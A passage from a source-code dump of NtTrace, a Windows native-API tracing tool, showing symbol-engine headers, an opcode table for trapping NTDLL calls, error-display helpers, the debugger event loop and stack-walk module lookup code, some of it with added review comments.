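    // a multibyte string never needs more wide characters than it has bytes
    std::vector< wchar_t > chArray( len );
    mbstowcs( &chArray[0], mbString, len );
    return std::wstring( &chArray[0] );
}

}

#pragma warning( pop )

#endif // STRFROMWCHAR_H_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/SymTagEnum.h:
--------------------------------------------------------------------------------
#ifndef SYMTAGENUM_H_
#define SYMTAGENUM_H_

// $Id: SymTagEnum.h 5 2006-09-18 21:13:00Z Roger $

/** Enumeration extracted from DbgHelp.h in Debugging Tools for Windows SDK */
enum SymTagEnum
{
    SymTagNull,
    SymTagExe,
    SymTagCompiland,
    SymTagCompilandDetails,
    SymTagCompilandEnv,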
SymTagFunction, 15 | SymTagBlock, 16 | SymTagData, 17 | SymTagAnnotation, 18 | SymTagLabel, 19 | SymTagPublicSymbol, 20 | SymTagUDT, 21 | SymTagEnum, 22 | SymTagFunctionType, 23 | SymTagPointerType, 24 | SymTagArrayType, 25 | SymTagBaseType, 26 | SymTagTypedef, 27 | SymTagBaseClass, 28 | SymTagFriend, 29 | SymTagFunctionArgType, 30 | SymTagFuncDebugStart, 31 | SymTagFuncDebugEnd, 32 | SymTagUsingNamespace, 33 | SymTagVTableShape, 34 | SymTagVTable, 35 | SymTagCustom, 36 | SymTagThunk, 37 | SymTagCustomType, 38 | SymTagManagedType, 39 | SymTagDimension, 40 | SymTagMax 41 | }; 42 | 43 | #endif // SYMTAGENUM_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/SymbolEngine.h: -------------------------------------------------------------------------------- 1 | #ifndef OR2_SYMBOLENGINE_H 2 | #define OR2_SYMBOLENGINE_H 3 | 4 | /**@file 5 | 6 | Wrapper for DbgHelper to provide common utility functions for processing 7 | Microsoft PDB information. 8 | 9 | @author Roger Orr 10 | 11 | Copyright © 2003. 12 | This software is distributed in the hope that it will be useful, but 13 | without WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 15 | 16 | Permission is granted to anyone to make or distribute verbatim 17 | copies of this software provided that the copyright notice and 18 | this permission notice are preserved, and that the distributor 19 | grants the recipient permission for further distribution as permitted 20 | by this notice. 21 | 22 | Comments and suggestions are always welcome. 23 | Please report bugs to rogero@howzatt.demon.co.uk. 
24 | 25 | $Revision: 1405 $ 26 | */ 27 | 28 | // $Id: SymbolEngine.h 1405 2013-11-12 23:57:17Z Roger $ 29 | 30 | #include 31 | #include 32 | 33 | #include "..\include\DbgHelper.h" 34 | 35 | namespace or2 36 | { 37 | 38 | /** Symbol Engine wrapper to assist with processing PDB information */ 39 | class SymbolEngine : public DbgHelper 40 | { 41 | public: 42 | /** Construct wrapper for specified process */ 43 | SymbolEngine( HANDLE hPRocess ); 44 | 45 | /** Destroy wrapper */ 46 | ~SymbolEngine( ); 47 | 48 | /** Print address to a stream, return true if information cacheable */ 49 | bool printAddress( PVOID address, std::ostream& os ) const; 50 | 51 | /** Convert address to a string */ 52 | std::string addressToName( PVOID address ) const; 53 | 54 | /** Provide a stack trace for the 'origContext' using current depth and params */ 55 | void StackTrace( HANDLE hThread, const CONTEXT & origContext, std::ostream & os ) const; 56 | 57 | /** get context for the current thread, correcting the stack frame to the caller */ 58 | #ifdef _M_IX86 59 | static BOOL GetCurrentThreadContext( CONTEXT * pContext ); 60 | #else 61 | static void (WINAPI *GetCurrentThreadContext)(PCONTEXT pContext); 62 | 63 | #endif // _M_IX86 64 | 65 | /** Provide an stack trace of the structured exception records starting at 'ExceptionList' using current seh depth */ 66 | void SEHTrace( PVOID ExceptionList, std::ostream& os ) const; 67 | 68 | /** Set true to show line numbers if possible */ 69 | void setLines( bool value ); 70 | /** Get whether line numbers are being shown if possible */ 71 | bool getLines() const; 72 | 73 | /** Set true to show parameters */ 74 | void setParams( bool value ); 75 | /** Get whether to show parameters */ 76 | bool getParams() const; 77 | 78 | /** Set true to show variables */ 79 | void setVariables( bool value ); 80 | /** Get whether to show variables */ 81 | bool getVariables() const; 82 | 83 | /** Set stack depth for walkbacks */ 84 | void setMaxDepth( int value ); 85 | 
/** Get stack depth for walkbacks */ 86 | int getMaxDepth() const; 87 | 88 | /** Set skip count for stack walkbacks */ 89 | void setSkipCount( int value ); 90 | /** Get skip count for stack walkbacks */ 91 | int getSkipCount() const; 92 | 93 | /** Set SEH stack depth for walkbacks */ 94 | void setSehDepth( int value ); 95 | /** Get SEH stack depth for walkbacks */ 96 | int getSehDepth() const; 97 | 98 | /** Hack to try and get first catch handler for MSVC exception */ 99 | bool findMsvcCppHandler( PVOID sehHandler, PVOID *msvcHandler ) const; 100 | 101 | /** Attempt to find type information for MSVC C++ throw parameter */ 102 | void showMsvcThrow( std::ostream &ofs, PVOID throwInfo, PVOID base ) const; 103 | 104 | /** ReadMemory from the target process */ 105 | bool ReadMemory( 106 | LPCVOID lpBaseAddress, // base of memory area 107 | LPVOID lpBuffer, // data buffer 108 | SIZE_T nSize ) const; // number of bytes to read 109 | 110 | /** decorate name for a symbol with the full data type */ 111 | BOOL decorateName( std::string & name, ULONG64 ModBase, ULONG TypeIndex ) const; 112 | 113 | /** call back interface for enumerating locals */ 114 | class EnumLocalCallBack 115 | { 116 | public: 117 | /** callback function called for each enumerated local */ 118 | virtual bool operator()( SymbolEngine const & eng, struct _SYMBOL_INFO* pSymInfo ) = 0; 119 | }; 120 | 121 | /** enumerate local variables at an address */ 122 | BOOL enumLocalVariables( DWORD64 codeOffset, DWORD64 frameOffset, EnumLocalCallBack & cb ) const; 123 | 124 | /** Write a simple mini-dump for an exception in the current thread */ 125 | BOOL dumpSelf( std::string const & miniDumpFile, EXCEPTION_POINTERS *ExceptionInfo ); 126 | 127 | /** Read a string from the target */ 128 | std::string getString(PVOID address, BOOL unicode, DWORD maxStringLength) const; 129 | 130 | /** Returns whether address points to executable code */ 131 | bool isExecutable( DWORD64 address ) const; 132 | 133 | private: 134 | 
SymbolEngine( SymbolEngine const & ); 135 | SymbolEngine& operator=( SymbolEngine const & ); 136 | 137 | bool showLines; // true to show lines 138 | bool showParams; // true to show parameters 139 | bool showVariables; // true to show variables 140 | int maxStackDepth; // max stack depth to show, -1 for all 141 | int skipCount; // stack frames to skip 142 | int maxSehDepth; // max SEH stack depth to show 143 | 144 | struct Impl; 145 | Impl *pImpl; 146 | }; 147 | 148 | } 149 | 150 | #endif // OR2_SYMBOLENGINE_H 151 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/TrapNtOpcodes.h: -------------------------------------------------------------------------------- 1 | #ifndef TRAPNTOPCODES_H_ 2 | #define TRAPNTOPCODES_H_ 3 | 4 | /**@file 5 | 6 | List of opcodes used by NtTrace to trap calls in NTDLL. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2002,2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 

$Revision: 1405 $
*/

// $Id: TrapNtOpcodes.h 1405 2013-11-12 23:57:17Z Roger $

// First opcode byte of the x86 (32-bit) instructions NtTrace looks for when
// recognising and trapping call sequences in NTDLL. Where the byte introduces
// an opcode group (0x83, 0xFF) the following ModRM byte selects the actual
// instruction; the comment names the form NtTrace expects.
static const unsigned char XOR         = 0x33; ///< xor r32, r/m32
static const unsigned char AddEsp      = 0x83; ///< group 1 with imm8, used as add esp,04h (83 C4 04)
static const unsigned char MOVreg      = 0x8B; ///< mov r32, r/m32
static const unsigned char LEA         = 0x8D; ///< lea r32, m
static const unsigned char NOP         = 0x90; ///< nop
static const unsigned char MOVdwordEax = 0xB8; ///< mov eax, imm32
static const unsigned char MOVdwordEcx = 0xB9; ///< mov ecx, imm32
static const unsigned char MOVdwordEdx = 0xBA; ///< mov edx, imm32
static const unsigned char CallReg     = 0xFF; ///< group 5, used as call r/m32 (FF /2), e.g. call edx
static const unsigned char RETn        = 0xC2; ///< ret imm16
static const unsigned char RET         = 0xC3; ///< ret
static const unsigned char BRKPT       = 0xCC; ///< int 3 (breakpoint)
static const unsigned char INTn        = 0xCD; ///< int imm8
static const unsigned char JMP         = 0xE9; ///< jmp rel32 (near relative jump; 0xEA would be the far form)
static const unsigned char FS          = 0x64; ///< fs: segment override prefix

#endif // TRAPNTOPCODES_H_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/buildVersion.h:
--------------------------------------------------------------------------------
#define BUILD_VERSION 42

--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/displayError.h:
--------------------------------------------------------------------------------
#ifndef DISPLAY_ERROR_H_
#define DISPLAY_ERROR_H_

/**
@file
Function for displaying Win32 error to a stream.

EXAMPLE
 9 |     std::cerr << displayError( GetLastError() );
10 |     
11 | 12 | @author Roger Orr 13 | 14 | Copyright © 2004. 15 | This software is distributed in the hope that it will be useful, but 16 | without WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 18 | 19 | Permission is granted to anyone to make or distribute verbatim 20 | copies of this software provided that the copyright notice and 21 | this permission notice are preserved, and that the distributor 22 | grants the recipient permission for further distribution as permitted 23 | by this notice. 24 | 25 | Comments and suggestions are always welcome. 26 | Please report bugs to rogero@howzatt.demon.co.uk. 27 | 28 | $Revision: 1405 $ 29 | */ 30 | 31 | // $Id: displayError.h 1405 2013-11-12 23:57:17Z Roger $ 32 | 33 | #include 34 | #include 35 | 36 | namespace or2 37 | { 38 | 39 | #pragma warning(push) 40 | #pragma warning(disable: 4512) // assignment operator could not be generated 41 | 42 | /** manipulator */ 43 | class displayError { 44 | public: 45 | /** Default ctor wraps GetLastError() */ 46 | displayError(); 47 | 48 | /** 49 | * Construct from an hresult 50 | * @param hresult the error code to display 51 | */ 52 | displayError(HRESULT hresult); 53 | 54 | /** 55 | * Print the error 56 | * @param os the output stream to write to 57 | */ 58 | void printOn(std::ostream &os) const; 59 | private: 60 | HRESULT const hresult; 61 | }; 62 | 63 | #pragma warning(pop) 64 | 65 | /** Stream a displayError manipulator */ 66 | std::ostream & operator<<(std::ostream & os, displayError const &se); 67 | 68 | } 69 | 70 | #include "displayError.inl" 71 | 72 | #endif // DISPLAY_ERROR_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/displayError.inl: -------------------------------------------------------------------------------- 1 | #ifndef DISPLAY_ERROR_INL_ 2 | #define DISPLAY_ERROR_INL_ 3 | 4 | #include 5 | #include 6 | 7 | namespace or2 8 | { 9 
| 10 | /** 11 | Implementation of function for displaying Win32 error to a stream. 12 | 13 | EXAMPLE
 14 |     std::cerr << displayError( GetLastError() );
 15 |     
16 | 17 | @author Roger Orr 18 | 19 | Copyright © 2004. 20 | This software is distributed in the hope that it will be useful, but 21 | without WITHOUT ANY WARRANTY; without even the implied warranty of 22 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 23 | 24 | Permission is granted to anyone to make or distribute verbatim 25 | copies of this software provided that the copyright notice and 26 | this permission notice are preserved, and that the distributor 27 | grants the recipient permission for further distribution as permitted 28 | by this notice. 29 | 30 | Comments and suggestions are always welcome. 31 | Please report bugs to rogero@howzatt.demon.co.uk. 32 | 33 | $Revision: 1405 $ 34 | */ 35 | 36 | // $Id: displayError.inl 1405 2013-11-12 23:57:17Z Roger $ 37 | /* Default constructor: captures the calling thread's last-error value via GetLastError(), so it has to be built before any other Win32 call disturbs that value (the callers in this project construct it directly inside the stream expression that reports the failure). */ 38 | inline 39 | displayError::displayError() 40 | : hresult(GetLastError()) 41 | {} 42 | /* Constructs from an explicit code; 0 is rendered as "no error" by printOn(). @param hresult the Win32 error / HRESULT value to describe */ 43 | inline 44 | displayError::displayError(HRESULT hresult) 45 | : hresult(hresult) 46 | {} 47 | /* Streams a human-readable form of the stored code onto os: "no error" for 0; otherwise the system message text obtained from FormatMessage(), with a trailing newline / carriage return / period stripped, as "error <code> (<text>)"; or "Win32 error: <code>" when no message text is available. Negative codes are printed in hex, and the stream is switched back to decimal afterwards. @param os the stream written to */ 48 | inline 49 | void displayError::printOn(std::ostream &os) const 50 | { 51 | if ( hresult == 0 ) 52 | { 53 | os << "no error"; 54 | return; 55 | } 56 | 57 | LPTSTR pszMsg = 0; 58 | /* FormatMessage()'s return value is not checked; pszMsg staying null is what signals "no message" below. NOTE(review): strlen() further down treats the buffer as char, i.e. a non-UNICODE build is assumed — confirm the project never defines UNICODE. */ 59 | FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, 60 | 0, 61 | hresult, 62 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 63 | (LPTSTR)&pszMsg, 64 | 0, 65 | NULL ); 66 | if ( pszMsg != 0 ) 67 | { 68 | size_t nLen = strlen(pszMsg); /* strip the trailing newline, carriage return and period the system text carries so it fits inside the parentheses below */ 69 | if (nLen > 1 && pszMsg[nLen - 1] == '\n') { 70 | pszMsg[--nLen] = 0; 71 | if (nLen > 1 && pszMsg[nLen - 1] == '\r') { 72 | pszMsg[--nLen] = 0; 73 | } 74 | if (nLen > 1 && pszMsg[nLen - 1] == '.') { 75 | pszMsg[--nLen] = 0; 76 | } 77 | } 78 | 79 | if ( hresult < 0 ) 80 | os << std::hex; 81 | os << "error " << hresult << std::dec << " (" << pszMsg << ")"; 82 | ::LocalFree( pszMsg ); /* the buffer came from FORMAT_MESSAGE_ALLOCATE_BUFFER, so LocalFree() is the matching release */ 83 | } 84 | else 85 | { 86 | if ( hresult < 0 ) 87 | os << std::hex; 88 | os << "Win32 error: " << hresult << std::dec; 89 | } 90 | } 91 | 92 | /* Stream a 
displayError manipulator: forwards to printOn() and returns os so the call can be chained. */ 93 | inline 94 | std::ostream & operator<<(std::ostream & os, displayError const &se) 95 | { 96 | se.printOn(os); 97 | return os; 98 | } 99 | 100 | } // namespace 101 | 102 | #endif // DISPLAY_ERROR_INL_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/log.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/log.txt -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/src/DebugDriver.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | NAME 3 | DebugDriver.cpp 4 | 5 | DESCRIPTION 6 | Implementation of the debug driver code 7 | 8 | COPYRIGHT 9 | Copyright (C) 2002,2003 by Roger Orr 10 | 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 
23 | */ 24 | 25 | #pragma warning( disable: 4786 ) // identifier was truncated to '255' characters 26 | 27 | #include "DebugDriver.h" 28 | /* NOTE(review): the system header name after the next #include was stripped by the page rendering (angle-bracket text lost); consult the file in the repository for the exact header. */ 29 | #include 30 | 31 | #include "displayError.h" 32 | 33 | static char const szRCSID[] = "$Id: DebugDriver.cpp 1405 2013-11-12 23:57:17Z Roger $"; 34 | 35 | ////////////////////////////////////////////////////////////////////////// 36 | /* Main debugger loop: pumps WaitForDebugEvent() / ContinueDebugEvent() for every debuggee, dispatches each event to the On*() callbacks of `debugger`, and keeps processMap (process handle plus per-thread handle map) in step with CREATE_*/EXIT_* events. Returns when WaitForDebugEvent() fails — including the 1 ms timeout armed once the last debuggee has exited — or when debugger.Active() turns false. Failures of CloseHandle()/ContinueDebugEvent() are reported on std::cerr and do not end the loop. @param debugger receiver of the event callbacks; it may change the continue status through the pointer passed to OnException() */ 37 | void or2::DebugDriver::Loop( Debugger & debugger ) 38 | { 39 | ULONG timeout = INFINITE; 40 | DEBUG_EVENT DebugEvent; 41 | 42 | while ( WaitForDebugEvent( 43 | &DebugEvent, // debug event information 44 | timeout // time-out value 45 | ) && debugger.Active() ) 46 | { 47 | DWORD continueFlag = DBG_CONTINUE; 48 | switch ( DebugEvent.dwDebugEventCode ) 49 | { 50 | case EXCEPTION_DEBUG_EVENT: 51 | { /* NOTE(review): operator[] default-inserts an entry for a pid/tid that never arrived in a CREATE_* event; what pe.hProcess and hThread hold in that case depends on ProcessEntry/ThreadMap in DebugDriver.h — confirm before relying on them in OnException(). */ 52 | ProcessEntry & pe = processMap[ DebugEvent.dwProcessId ]; 53 | ThreadMap & tm = pe.threadMap; 54 | HANDLE hThread = tm[ DebugEvent.dwThreadId ]; 55 | 56 | // The first breakpoint is called by attaching to the process. 57 | if ( ! 
pe.attached && 58 | ( DebugEvent.u.Exception.ExceptionRecord.ExceptionCode == STATUS_BREAKPOINT ) ) 59 | { 60 | pe.attached = true; 61 | } 62 | else 63 | { /* every other exception is handed back to the debuggee as not-handled, unless OnException() below overrides continueFlag */ 64 | continueFlag = DBG_EXCEPTION_NOT_HANDLED; 65 | } 66 | 67 | debugger.OnException( pe.hProcess, hThread, DebugEvent.dwProcessId, DebugEvent.dwThreadId, DebugEvent.u.Exception, &continueFlag ); 68 | } 69 | break; 70 | 71 | case CREATE_THREAD_DEBUG_EVENT: 72 | { 73 | ProcessEntry & processEntry = processMap[ DebugEvent.dwProcessId ]; 74 | processEntry.threadMap[ DebugEvent.dwThreadId ] = DebugEvent.u.CreateThread.hThread; 75 | 76 | debugger.OnCreateThread( DebugEvent.dwThreadId, DebugEvent.u.CreateThread ); 77 | } 78 | break; 79 | 80 | case CREATE_PROCESS_DEBUG_EVENT: 81 | { /* NOTE(review): pe.attached is not set here, so the first-breakpoint logic above relies on ProcessEntry default-initialising it to false — confirm in DebugDriver.h. */ 82 | ProcessEntry pe; 83 | pe.hProcess = DebugEvent.u.CreateProcessInfo.hProcess; 84 | pe.threadMap[ DebugEvent.dwThreadId ] = DebugEvent.u.CreateProcessInfo.hThread; 85 | processMap[ DebugEvent.dwProcessId ] = pe; 86 | 87 | debugger.OnCreateProcess( DebugEvent.dwProcessId, DebugEvent.dwThreadId, DebugEvent.u.CreateProcessInfo ); 88 | 89 | // Close unwanted handle (following John Robbins) 90 | if ( ( DebugEvent.u.CreateProcessInfo.hFile != 0 ) && 91 | ( ! 
CloseHandle( DebugEvent.u.CreateProcessInfo.hFile ) ) ) 92 | { /* the image file handle delivered with the event is ours to release; a failure is logged but does not stop the loop */ 93 | std::cerr << "Unable to close process file handle: " << displayError() << std::endl; 94 | } 95 | 96 | break; 97 | } 98 | 99 | case EXIT_THREAD_DEBUG_EVENT: 100 | { 101 | ThreadMap & threadMap = processMap[ DebugEvent.dwProcessId ].threadMap; 102 | 103 | debugger.OnExitThread( DebugEvent.dwThreadId, DebugEvent.u.ExitThread ); 104 | /* the handle is only forgotten here, not closed */ 105 | threadMap.erase( DebugEvent.dwThreadId ); 106 | 107 | } 108 | break; 109 | 110 | case EXIT_PROCESS_DEBUG_EVENT: 111 | { 112 | debugger.OnExitProcess( DebugEvent.dwProcessId, DebugEvent.u.ExitProcess ); 113 | 114 | processMap.erase( DebugEvent.dwProcessId ); 115 | if ( processMap.empty() ) 116 | { 117 | timeout = 1; /* Nothing left to live for :-) — with no debuggees, a 1 ms wait makes the next WaitForDebugEvent() fail and so ends the loop */ 118 | } 119 | 120 | break; 121 | } 122 | 123 | case LOAD_DLL_DEBUG_EVENT: 124 | { 125 | HANDLE hProcess = processMap[ DebugEvent.dwProcessId ].hProcess; 126 | 127 | debugger.OnLoadDll( hProcess, DebugEvent.u.LoadDll ); 128 | 129 | // Close unwanted handle (following John Robbins) 130 | if ( ( DebugEvent.u.LoadDll.hFile != 0 ) && 131 | ( ! CloseHandle( DebugEvent.u.LoadDll.hFile ) ) ) 132 | { 133 | std::cerr << "Unable to close dll file handle: " << displayError() << std::endl; 134 | } 135 | } 136 | break; 137 | 138 | case UNLOAD_DLL_DEBUG_EVENT: 139 | debugger.OnUnloadDll( DebugEvent.u.UnloadDll ); 140 | break; 141 | 142 | case OUTPUT_DEBUG_STRING_EVENT: 143 | { 144 | HANDLE hProcess = processMap[ DebugEvent.dwProcessId ].hProcess; 145 | 146 | debugger.OnOutputDebugString( hProcess, DebugEvent.u.DebugString ); 147 | } 148 | break; 149 | 150 | default: /* unknown event codes are reported and still continued with DBG_CONTINUE */ 151 | std::cerr << "Got unexpected debug event " << DebugEvent.dwDebugEventCode << std::endl; 152 | break; 153 | } 154 | 155 | if ( ! 
ContinueDebugEvent( DebugEvent.dwProcessId, DebugEvent.dwThreadId, continueFlag ) ) 156 | { 157 | std::cerr << "Error " << displayError() << " continuing debug event" << std::endl; 158 | } 159 | } 160 | } 161 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/src/GetFileNameFromHandle.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/src/GetFileNameFromHandle.cpp -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/src/GetModuleBase.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | NAME 3 | GetModuleBase.cpp 4 | 5 | DESCRIPTION 6 | Helper for stack walking. 7 | 8 | COPYRIGHT 9 | Copyright (C) 2003 by Roger Orr 10 | 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 
23 | */ 24 | /* NOTE(review): the system header names after the #include directives below, and the template arguments of std::vector and const_cast further down, were stripped by the page rendering (angle-bracket text lost); consult the file in the repository for the exact text. */ 25 | #include "GetModuleBase.h" 26 | 27 | #include 28 | #include 29 | #include // GetModuleFileNameEx 30 | #include 31 | #include 32 | 33 | #pragma comment( lib, "psapi" ) 34 | 35 | static char const szRCSID[] = "$Id: GetModuleBase.cpp 1405 2013-11-12 23:57:17Z Roger $"; 36 | 37 | namespace 38 | { 39 | ////////////////////////////////////////////////////////// 40 | /* fix for problem with resource leak in symsrv: once SymSrv is present in this process, take one extra LoadLibrary() reference that is never released (no FreeLibrary() anywhere here), so the module stays resident for the life of the process; `loaded` makes this a one-time action. */ 41 | void fixSymSrv() 42 | { 43 | static bool loaded = false; 44 | if ( !loaded ) 45 | { 46 | HMODULE const hSymSrv = ::GetModuleHandle( "SymSrv" ); 47 | if ( hSymSrv != 0 ) 48 | { 49 | ::LoadLibrary( "SymSrv" ); 50 | loaded = true; 51 | } 52 | } 53 | } 54 | } 55 | 56 | ///////////////////////////////////////////////////////////////////////////////////// 57 | /// GetModuleBase: try to get information about a module being loaded 58 | /// 59 | /// This function is called by the stack walker to load symbols for a new address. 60 | /// NOTES: 61 | /// This function is needed because we are using FALSE for the last parameter of 62 | /// SymInitialize(), which prevents ALL modules being automatically loaded and so 63 | /// dramatically improves the speed of the stack walk 64 | /// We check whether the address is valid first because some invalid addresses 65 | /// cause access violations inside DbgHelp.dll 66 | /// /* Flow: if VirtualQueryEx() says the address is committed/reserved (not MEM_FREE), ask SymGetModuleInfo64() first; on a miss fall back to the allocation base, look up the module's file name, temporarily prepend the module's directory to the DbgHelp search path so a .pdb stored beside the image is found, call SymLoadModule64() (its failure is ignored) and restore the original search path. @param hProcess handle of the process whose address space is queried @param dwAddress the address being resolved @returns the base address of the module containing dwAddress, or 0 when the address is free memory or no module information could be obtained */ 67 | DWORD64 CALLBACK GetModuleBase( HANDLE hProcess, DWORD64 dwAddress ) 68 | { 69 | DWORD64 baseAddress = 0; 70 | 71 | MEMORY_BASIC_INFORMATION mbInfo; 72 | if ( ::VirtualQueryEx( hProcess, (PVOID)dwAddress, &mbInfo, sizeof( mbInfo ) ) && 73 | ( ( mbInfo.State & MEM_FREE ) == 0 ) ) 74 | { 75 | // Is it already in the symbol engine? 
76 | IMAGEHLP_MODULE64 stIHM = { sizeof ( IMAGEHLP_MODULE64 ) }; 77 | 78 | if ( ::SymGetModuleInfo64( hProcess, dwAddress, &stIHM ) ) 79 | { 80 | baseAddress = stIHM.BaseOfImage; 81 | //ATLTRACE("showGetModuleBase got addr from SymGetModuleInfo = %x\n", baseAddress); 82 | } 83 | else 84 | { /* not known to DbgHelp yet: the allocation base of the region is taken as the module base and doubles as the HMODULE for the name lookup */ 85 | baseAddress = (DWORD64)mbInfo.AllocationBase; 86 | HMODULE const hmod = (HMODULE)mbInfo.AllocationBase; 87 | 88 | char szFileName[ MAX_PATH ] = ""; 89 | DWORD const dwNameLen = GetModuleFileNameWrapper( hProcess, hmod, szFileName, sizeof szFileName/sizeof szFileName[0] ); 90 | 91 | if ( 0 != dwNameLen ) 92 | { 93 | bool bPathSet( false ); 94 | std::vector searchpath( 1024 ); 95 | if ( ::SymGetSearchPath( hProcess, &searchpath[0], 1024 ) ) 96 | { 97 | // symbol files often stored with binary image 98 | /* NOTE(review): prepending the image's own directory means DbgHelp will pick up and parse a .pdb found there, inside this (debugger) process; for modules that live in a directory the traced program can write to, consider whether that is acceptable for the analysis workflow. */ char const * delim = strrchr( szFileName, '\\' ); 99 | if ( delim ) 100 | { 101 | std::string fullpath( szFileName, delim - szFileName ); 102 | fullpath += ";"; 103 | fullpath += &searchpath[0]; 104 | ::SymSetSearchPath( hProcess, const_cast(fullpath.c_str()) ); // Some versions of DbgHelp.h not const-correct 105 | bPathSet = true; 106 | } 107 | } 108 | // We do not need to pass a file handle - trapNtCalls reveals that DbgHelp simply opens the file 109 | // if we don't provide a handle or duplicates the handle if we do. 110 | if (!::SymLoadModule64( hProcess, NULL, szFileName, NULL, baseAddress, 0 )) 111 | { /* failure is deliberately ignored: baseAddress is still returned so the stack walk can proceed without symbols for this module */ 112 | //ATLTRACE("SymLoadModule, failed for %s\n", szFileName); 113 | } 114 | fixSymSrv(); 115 | if ( bPathSet ) /* restore the caller's search path; only happens when SymGetSearchPath() succeeded and a directory separator was found */ 116 | { 117 | ::SymSetSearchPath( hProcess, const_cast(&searchpath[0]) ); 118 | } 119 | } 120 | else 121 | { 122 | //ATLTRACE("Module not found at %X\n", baseAddress); 123 | } 124 | 125 | //ATLTRACE("GetModuleBase got addr from VirtualQueryEx = %x\n", baseAddress); 126 | } 127 | } 128 | 129 | return baseAddress; 130 | } 131 | 132 | /** 133 | * Get module file name, correcting for a couple of common issues. 
134 | * 135 | * @param hProcess the process to query 136 | * @param hMod the module to query 137 | * @param szBuff the output filename buffer 138 | * @param bufLen the size of the output buffer 139 | * @returns the length of the string copied to the buffer, or zero on failure, 140 | * in which case call GetLastError for the underlying error code. * Fallbacks, used only for hMod == 0 when GetModuleFileNameEx() fails with ERROR_PARTIAL_COPY or ERROR_INVALID_HANDLE: QueryFullProcessImageNameA from KERNEL32, then GetProcessImageFileNameA from psapi; each entry point is resolved once with GetProcAddress() and cached in a function-local static. If every fallback fails the original error code is restored with SetLastError(). A leading "\??\" prefix in the result is rewritten to "\\?\". NOTE(review): bufLen is passed by address to QueryFullProcessImageNameA and receives the number of characters written on success (which is what `ret = bufLen` relies on); what it holds after a failed call is not established here, yet it is reused as the buffer size for GetProcessImageFileNameA — confirm against the API contract. NOTE(review): the typedef declares lpExeName as LPCSTR although the API writes into it; presumably LPSTR was intended — harmless here since the pointer is only passed through. 141 | */ 142 | DWORD GetModuleFileNameWrapper( HANDLE hProcess, HMODULE hMod, char * szBuff, DWORD bufLen ) 143 | { 144 | DWORD ret = ::GetModuleFileNameEx( hProcess, hMod, szBuff, bufLen ); 145 | if (ret == 0 && hMod == 0) 146 | { 147 | DWORD lastError = GetLastError(); 148 | if (lastError == ERROR_PARTIAL_COPY || lastError == ERROR_INVALID_HANDLE) 149 | { 150 | // Use alternate API to get exe name in 64-bit windows. 151 | typedef BOOL (WINAPI *pfnQueryFullProcessImageName)( 152 | /*__in*/ HANDLE hProcess, 153 | /*__in*/ DWORD dwFlags, 154 | /*__out*/ LPCSTR lpExeName, 155 | /*__inout*/ PDWORD lpdwSize 156 | ); 157 | 158 | static pfnQueryFullProcessImageName pQueryFullProcessImageName = (pfnQueryFullProcessImageName)GetProcAddress(GetModuleHandle("KERNEL32"), "QueryFullProcessImageNameA"); 159 | 160 | if (pQueryFullProcessImageName && pQueryFullProcessImageName(hProcess, 0, szBuff, &bufLen)) 161 | { 162 | ret = bufLen; 163 | } 164 | else 165 | { 166 | // Windows 2003 only has this one: which returns paths in device form 167 | typedef DWORD (WINAPI *pfnGetProcessImageFileName)( 168 | IN HANDLE hProcess, 169 | OUT LPTSTR lpImageFileName, 170 | IN DWORD nSize 171 | ); 172 | 173 | static pfnGetProcessImageFileName pGetProcessImageFileName = (pfnGetProcessImageFileName)GetProcAddress(GetModuleHandle("psapi"), "GetProcessImageFileNameA"); 174 | if (pGetProcessImageFileName) 175 | { 176 | ret = 